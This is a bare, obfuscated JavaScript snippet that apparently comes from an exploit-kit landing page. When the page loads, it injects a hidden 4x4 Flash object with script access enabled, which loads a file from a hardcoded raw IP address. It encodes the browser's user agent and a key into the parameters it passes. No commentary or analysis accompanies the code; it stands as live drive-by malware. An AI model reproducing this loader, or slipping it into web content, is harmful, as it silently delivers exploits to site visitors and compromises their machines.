/*s6475d67947hssfj8637fs*/function hgfgerdfgdf(num, width){/*s8533d15356hfj58235fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s70442d77421hfj48466fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s60691d71610hfj34291fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s96536d42437hfj37404fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd21574hfs*/c += b + d;/*s39146d88434hfj38177fs*/e += 1;}return c;}/*s55193dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.33.125/?MTAyMjkwMTY3&info=NDQ2ODEwNDQ=&elsa=a1jEPRKgQznIxcBlgU9q-ti0DXnECdg5fU_ByKMAgX-JaXR-I72VygnbAkdcglwReE61ETi-tL&rand=xX_QMvWebRXQC53EKvrcT6NEMVHRH0CL2Y-dmrHTefjaelWkzrLFTF_xozKASASG6_JtdfJRDQ&shld=NDk2NTExODI=", ghnvbn("http://188.225.33.125/?OTk3OTc4Njg=&elsa=a1jEPRKgQznIxfBlgU9a-ti0PXnECeg5fU_ByKMAgX-JaUR-I72VygnbMkdcwmwxSG6FENjOge&info=Nzg0MjY4Ng==&rand=xXzQMvWebRXQCJ3EKvncT6NHMVHRH0CL2YydmrHTefjaeVWkzrHFTF_yozKASwSG6_FtdfJSDQ&travel=NDgzNzA4NTM=","gexywoaxor"));